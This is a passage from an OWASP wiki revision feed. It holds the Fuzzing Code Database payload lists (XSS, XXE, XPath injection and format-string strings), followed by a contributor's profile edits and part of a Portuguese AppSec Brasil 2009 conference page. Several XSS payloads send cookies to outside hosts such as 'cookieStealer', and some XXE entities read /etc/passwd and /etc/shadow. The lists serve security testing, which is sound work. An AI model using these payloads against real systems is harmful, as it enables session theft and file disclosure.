'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:Ulisses_Castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105961</id>
		<title>User:Ulisses Castro</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105961"/>
				<updated>2011-02-28T18:22:50Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* Ulisses Castro's [mailto:uss.thebug@gmail.com mail contact], [[:Special:Contributions/Ulisses_Castro|wiki contributions]] and [http://ulissescastro.com personal blog].&lt;br /&gt;
&lt;br /&gt;
Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.&lt;br /&gt;
&lt;br /&gt;
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105960</id>
		<title>User:Ulisses Castro</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105960"/>
				<updated>2011-02-28T18:21:59Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* Ulisses Castro's [mailto:uss.thebug@gmail.com mail contact] and [[:Special:Contributions/Ulisses_Castro|wiki contributions]].&lt;br /&gt;
* [http://ulissescastro.com http://ulissescastro.com]&lt;br /&gt;
&lt;br /&gt;
Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.&lt;br /&gt;
&lt;br /&gt;
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105959</id>
		<title>User:Ulisses Castro</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105959"/>
				<updated>2011-02-28T18:21:00Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* Ulisses Castro's [mailto:uss.thebug@gmail.com mail contact] and [[:Special:Contributions/Ulisses_Castro|wiki contributions]].&lt;br /&gt;
* [http://ulissescastro.com link title]&lt;br /&gt;
&lt;br /&gt;
Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.&lt;br /&gt;
&lt;br /&gt;
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105958</id>
		<title>User:Ulisses Castro</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&amp;diff=105958"/>
				<updated>2011-02-28T18:17:43Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.&lt;br /&gt;
&lt;br /&gt;
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&amp;diff=73667</id>
		<title>AppSec Brasil 2009 (pt-br)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&amp;diff=73667"/>
				<updated>2009-11-18T14:40:24Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: /* Datas */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009)  =&lt;br /&gt;
&lt;br /&gt;
A comunidade [http://www.ticontrole.gov.br Comunidade TI-Controle] e o Centro de Informática da [http://www.camara.gov.br Câmara dos Deputados] apresentam a '''Conferência Internacional de Segurança de Aplicações''', que será realizada com o apoio do OWASP ([http://www.owasp.org/index.php/About_OWASP Open Web Application Security Project]) em [http://en.wikipedia.org/wiki/Brasília Brasília], capital do Brasil. A conferência consistirá de dois dias de treinamentos, seguidos de dois dias de plenárias em trilha única. &lt;br /&gt;
&lt;br /&gt;
[[Image:Brasilia Panorama.jpg]] &lt;br /&gt;
&lt;br /&gt;
== Datas  ==&lt;br /&gt;
&lt;br /&gt;
A Conferência ocorrerá do dia 27 ao 30 de outubro de 2009. Os dias 27 e 28 de outubro serão dedicados ao mini-cursos e os dias 29 e 30 terão as sessões plenárias. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Promoção  ====&lt;br /&gt;
&lt;br /&gt;
Esta conferência é promovida pela Comunidade [http://www.ticontrole.gov.br TI-Controle] e organizada pelo Centro de Informática da [http://www.camara.gov.br/ Câmara dos Deputados]. &lt;br /&gt;
&lt;br /&gt;
A Conferência tem o apoio do OWASP, [[Brazilian|Capítulo Brasil]], como provedor de conteúdo (seleção de palestras e cursos e montagem da grade de horários). &lt;br /&gt;
&lt;br /&gt;
A Conferência tem o apoio da [http://www.unb.br Universidade de Brasília (UnB)] [[Image:Unb.gif|60px]] &lt;br /&gt;
&lt;br /&gt;
A Conferência tem o patrocínio de [http://www.conviso.com.br Conviso IT Security] [[Image:CorVersao BR Small.jpg|100px]] e [http://www.leadcomm.com.br LeadComm] [[Image:LeadComm Logo Screen.jpg|100px]] &lt;br /&gt;
&lt;br /&gt;
==== Keynotes  ====&lt;br /&gt;
&lt;br /&gt;
'''Gary McGraw''' &lt;br /&gt;
&lt;br /&gt;
CTO, [http://www.cigital.com Cigital] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Image:GaryMcGraw.JPG|left|60px]] &lt;br /&gt;
&lt;br /&gt;
''Título:'' '''O Modelo de Maturidade Building Security In (BSIMM)''' &lt;br /&gt;
&lt;br /&gt;
''Biografia:'' Gary McGraw é o CTO da Cigital, Inc., uma empresa de segurança e qualidade de software com sede em Washington, Estados Unidos. Ele é reconhecido mundialmente como uma autoridade em segurança de software e é autor de oito importantes livros sobre este tópico, incluindo: &amp;quot;Java Security&amp;quot;, &amp;quot;Building Secure Software&amp;quot;, &amp;quot;Exploiting software&amp;quot;, &amp;quot;Software Security&amp;quot; e &amp;quot;Exploiting Online Games&amp;quot;. Ele é também editor da série de livros sobre segurança de software na editora Addison-Wesley. Dr. McGraw também escreveu mais de 100 artigos científicos, escreve uma coluna mensal para o site informIT e é frequentemente citado na mídia. Além de servir como consultor estratégico para importantes empresas e executivos de TI, Gary faz parte dos Conselhos Administrativos das empresas Fortify Software e Raven White. Ele recebeu um PhD duplo em Ciência Cognitiva e Ciência da Computação pela Universidade de Indiana, onde ele faz parte do Conselho Consultivo da Escola de Informática. Ele também produz o podcast &amp;quot;Silver Bullet&amp;quot; para a revista IEEE Security &amp;amp;amp; Privacy e produz o podcast Reality Check Security para o site CSO online. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Jason Li''' &lt;br /&gt;
&lt;br /&gt;
[http://www.aspectsecurity.com Aspect Security] &lt;br /&gt;
&lt;br /&gt;
''Título:'' '''Ágil e Seguro: É possível fazer os dois?''' &lt;br /&gt;
&lt;br /&gt;
Co-autor: '''Jerry Hoff''', Aspect Security &lt;br /&gt;
&lt;br /&gt;
''Biografias:'' Jason Li é engenheiro senior de segurança de aplicações na Aspect Security. Jason conduz revisões de arquiteturas de segurança, revisão de segurança em código de aplicações, testes de segurança e provê treinamentos de segurança em aplicações Web para diversas empresas do ramo de varejo, financeiro e governamentais. Ele também é ativamente envolvido na OWASP, apoiando do Comitê de Projetos Globais da OWASP e como co-autor do Projeto Antisamy da OWASP (versão Java). Jason obteve seu pós-mestrado em Ciências da Computação com concentração em Segurança da Informação pela Universidade Johns Hopkins. Ele obteve seu grau de Mestre em Ciências da Computação pela Universidade Cornell, onde obteve também sua graduação dupla, em Ciências da COmputação e Pesquisador de Operações. &lt;br /&gt;
&lt;br /&gt;
